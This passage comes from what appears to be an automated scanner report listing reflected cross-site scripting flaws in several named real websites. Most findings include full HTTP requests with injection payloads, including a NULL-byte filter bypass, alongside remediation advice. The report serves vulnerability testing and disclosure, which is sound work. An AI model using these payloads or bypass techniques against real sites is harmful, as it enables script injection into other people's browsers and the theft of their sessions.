GET /kochupusthakam76add<a>35d4dfe19df/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1 Host: connect.in.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache/2.2.4 (Unix) Pragma: no-cache nnCoection: close Content-Type: text/html Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0 Expires: Sat, 05 Feb 2011 21:51:15 GMT Date: Sat, 05 Feb 2011 21:51:15 GMT Content-Length: 27761 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Cont ...[SNIP]... <a href="/kochupusthakam76adda35d4dfe19df/profile.html">Kochupusthakam76add<a>35d4dfe19df</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %006e9cc<a>d0254a6f966 was submitted in the REST URL parameter 1. This input was echoed as 6e9cc<a>d0254a6f966 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%006e9cc<a>d0254a6f966/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:53 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1643 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d974"><script>alert(1)</script>c01828428ea was submitted in the REST URL parameter 1. This input was echoed as 5d974"><script>alert(1)</script>c01828428ea in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /weblog%005d974"><script>alert(1)</script>c01828428ea/2006/03/base/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:52 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 Vary: Accept-Encoding Content-Length: 1789 Connection: close Content-Type: text/html; charset=utf-8
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39526<a>384b191b99b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /weblog/2006/03/base39526<a>384b191b99b/ HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 16:04:58 GMT Server: Apache/2.2.6 (Win32) PHP/5.2.5 X-Powered-By: PHP/5.2.5 X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php Expires: Sun, 06 Feb 2011 16:04:58 GMT Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1351 Connection: close Content-Type: text/html; charset=UTF-8
4.33. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dean.edwards.name
Path:
/weblog/2006/03/base/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8af36"><script>alert(1)</script>770fc1d9d40 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8af36\"><script>alert(1)</script>770fc1d9d40 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /weblog/2006/03/base/?8af36"><script>alert(1)</script>770fc1d9d40=1 HTTP/1.1 Host: dean.edwards.name Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009da6c"><script>alert(1)</script>d18492e2c89 was submitted in the REST URL parameter 1. This input was echoed as 9da6c"><script>alert(1)</script>d18492e2c89 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%009da6c"><script>alert(1)</script>d18492e2c89 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c219f%3balert(1)//7aec04d590a was submitted in the jscallback parameter. This input was echoed as c219f;alert(1)//7aec04d590a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /al.asp?ts=20110205214821&adid=126828%2C0%2C3841%2C121057%2C0%2C0%2C0&cc=us&di=29848192%2C29951564%2C29471372%2C29167950%2C30018856%2C29875388%2C29651480&hk=1&ipid=18400&mh=57f4673cf4ad79544ac753cf0dd004c8&pid=2%2C2%2C2%2C2%2C2%2C2%2C2&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&pvu=4E02CE94902A497D8EBF5C1016534811&rcc=us&so=0&syid=0%2C0%2C0%2C0%2C0%2C0%2C0&uf=0%2C0%2C0%2C0%2C0%2C0%2C0&ur=0%2C0%2C0%2C0%2C0%2C0%2C0&kp=430%2C971%3B168%2C1189%3B238%2C1238%3B337%2C1717%3B479%2C2214%3B509%2C2742%3B346%2C4628%3B&prf=ll%3A2635%7Cintl%3A2738%7Cpreprochrome%3A2%7Cgetconchrome%3A251%7Ccontint%3A3224%7Ccontl%3A6220%7Cadvint%3A351%7Cadvl%3A6571%7Ctl%3A6773&jscallback=$iTXT.js.callback19c219f%3balert(1)//7aec04d590a HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:31 GMT; Path=/ Content-Type: text/javascript Content-Length: 66 Date: Sat, 05 Feb 2011 22:24:31 GMT Connection: close
The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f646d"><script>alert(1)</script>a066d7a2f43 was submitted in the src parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iframescript.jsp?src=http%3A%2F%2Fpixel.intellitxt.com%2Fpixel.jsp%3Fid%3D2773%2C2770%2C2765%2C2794%2C2792%2C2795%2C2763%2C2764%26type%3Dscript%26ipid%3D18400%26sfid%3D0f646d"><script>alert(1)</script>a066d7a2f43 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Content-Type: text/html Content-Length: 225 Date: Sat, 05 Feb 2011 22:24:19 GMT Connection: close
4.37. http://download32.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://download32.us.intellitxt.com
Path:
/intellitxt/front.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 24d8b'-alert(1)-'5f3e446269e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /intellitxt/front.asp?ipid=18400&24d8b'-alert(1)-'5f3e446269e=1 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63AIAAAEt7DS2iwA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/ Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Set-Cookie: VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt9+zoqAA-; Domain=.intellitxt.com; Expires=Wed, 06-Apr-2011 22:24:14 GMT; Path=/ Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:14 GMT Connection: close Content-Length: 10714
document.itxtDisabled=1; document.itxtDebugOn=false; if(document.itxtDisabled){ document.itxtInProg=1; if ('undefined'== typeof $iTXT){$iTXT={};};if (!$iTXT.cnst){$iTXT.cnst={};} if (!$iTXT.debug){$iT ...[SNIP]... ;_qoptions={tags:"721.8541.18400"};_qacct="p-fdwEfW0hIeH9U";$iTXT.js.load("http://edge.quantserve.com/quant.js");$iTXT.js.serverUrl='http://download32.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18400&24d8b'-alert(1)-'5f3e446269e=1';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();if (document.itxtIsReady) {document.itxtLoadLibraries();}; }
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 11ac3%3balert(1)//b19114a24fd was submitted in the jscallback parameter. This input was echoed as 11ac3;alert(1)//b19114a24fd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/advert?ts=1296942500943&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=12%2C6%2C18&jscallback=$iTXT.js.callback1811ac3%3balert(1)//b19114a24fd HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:31 GMT Connection: close Content-Length: 13687
(function(){var nh = new $iTXT.ui.Hook({value: "windows xp",uid: "4CE10DDD0B464E3594F4EBCDDB622BF1",uidh: "b33b1a94dd4778a9dbf40e8a55fbd665",advert: (function(){var ad = new $iTXT.data.Advert('$iTXT.t ...[SNIP]... track.hook'));$iTXT.glob.track.hook.push(new $iTXT.data.Pixel(19828494,'windows vista','http://pixel.intellitxt.com/pixel.jsp?id=2794&type=script',true,'$iTXT.glob.track.hook'));try{$iTXT.js.callback1811ac3;alert(1)//b19114a24fd();}catch(e){}
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload be98b%3balert(1)//513baa1609f was submitted in the jscallback parameter. This input was echoed as be98b;alert(1)//513baa1609f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/context?ts=1296942497719&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&sid=57f4673cf4ad79544ac753cf0dd004c8&pvu=4E02CE94902A497D8EBF5C1016534811&pvm=8cc57e88ff824e9e3d4bdb25eca56ba9&ipid=18400&cc=us&rcc=us®=tx&dma=623&city=Dallas&dat=12%2C6%2C18&pagecl=16914&jsoncl=16099&ppc=-1&hn=96&chunkkey=18400:57f4673cf4ad79544ac753cf0dd004c8:4CD59B7A613C41A19879C8AC98480C80:&data=%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A1%2Cc%3A%22Interactive%20DNS%20Query%20is%20a%20program%20designed%20to%20allow%20you%20to%20perform%20a%20query%20of%20DNS%20records.%20It%20is%20similar%20to%20the%20unix%20%5C%22dig%5C%22%20or%20%5C%22nslookup%5C%22%20commands%2C%20and%20uses%20a%20convenient%20GUI%20interface.%20Interactive%20DNS%20Query%20allows%20you%20to%20query%20for%20all%20types%20of%20DNS%20records%2C%20including%20A%2C%20MX%2C%20TXT%2C%20NS%2C%20etc.%22%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A2%2Cc%3A%22522.0%20KB%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A3%2Cc%3A%22Freeware%22%7D%2C%7Bp%3A1%2Ct%3A%22std%22%2Cn%3A4%2Cc%3A%22Windows%2095%2C%20Windows%2098%2C%20Windows%20Me%2C%20Windows%20NT%2C%20Windows%20XP%2C%20Windows%202000%22%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%5D%7D%2C%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bx%3A%5B%7Bp%3A1%2Cx%3A%5B%7Bt%3A%22std%22%2Cn%3A5%2Cc%3A%22The%20kick'n%20TCP%2FIP%20diagnostic%20toolkit%20-%20cool%20tools%20for%20network%20troubleshooting.%20Includes%20GeoRoute%20(a%20geographical%20trace%20route%20displayed%20on%20a%20world%20map)%2C%20iSpeed%20(an%20Internet%20speed%20tester%20whic&chunk=0&total=17&jscallback=$iTXT.js.callback1be98b%3balert(1)//513baa1609f HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Content-Length: 63 Date: Sat, 05 Feb 2011 22:24:25 GMT Connection: close
The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload bd0eb%3balert(1)//fa6a87ef4aa was submitted in the jscallback parameter. This input was echoed as bd0eb;alert(1)//fa6a87ef4aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0bd0eb%3balert(1)//fa6a87ef4aa HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:21 GMT Connection: close Content-Length: 19890
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... arams.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');$iTXT.data.Dom.detectSearchEngines();try{$iTXT.js.callback0bd0eb;alert(1)//fa6a87ef4aa({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}
4.41. http://download32.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://download32.us.intellitxt.com
Path:
/v4/init
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4db"-alert(1)-"99b36b51f6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /v4/init?ts=1296942497358&pagecl=16914&fv=10&muid=&refurl=http%3A%2F%2Fwww.download32.com%2Fnslookup-software.html&ipid=18400&jscallback=$iTXT.js.callback0&7f4db"-alert(1)-"99b36b51f6a=1 HTTP/1.1 Host: download32.us.intellitxt.com Proxy-Connection: keep-alive Referer: http://www.download32.com/nslookup-software.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: VM_PIX="AQAAAAEAAAQVAQAAAAEAAAEtqga0igAAAAAy/bdY"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63gEAAAEt98uhdQA-
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: private Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC" Access-Control-Allow-Origin: * Content-Type: application/x-javascript Vary: Accept-Encoding Date: Sat, 05 Feb 2011 22:24:23 GMT Connection: close Content-Length: 19871
var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h ...[SNIP]... ozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","city":"Dallas","jscallback":"$iTXT.js.callback0","7f4db"-alert(1)-"99b36b51f6a":"1","reg":"tx","refurl":"http://www.download32.com/nslookup-software.html","rcc":"us","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefined==$iTXT.glob.params){$iTXT.glob.params=new ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 was submitted in the REST URL parameter 1. This input was echoed as 2f79e<img src=a onerror=alert(1)>26b55a1d1b2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload2f79e<img%20src%3da%20onerror%3dalert(1)>26b55a1d1b2 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 was submitted in the REST URL parameter 1. This input was echoed as 72968\"><img src=a onerror=alert(1)>a36cb148e37 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload72968"><img%20src%3da%20onerror%3dalert(1)>a36cb148e37 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b8ed7<img src=a onerror=alert(1)>ec91bc08206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?b8ed7<img%20src%3da%20onerror%3dalert(1)>ec91bc08206=1 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a3c5e\"><img src=a onerror=alert(1)>e0edaa08961 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /download-ga-81845gv-gigabyte-vga-driver_freedownload?a3c5e"><img%20src%3da%20onerror%3dalert(1)>e0edaa08961=1 HTTP/1.1 Host: driverbyte.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 7a43e<script>alert(1)</script>9a66bdcec19 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
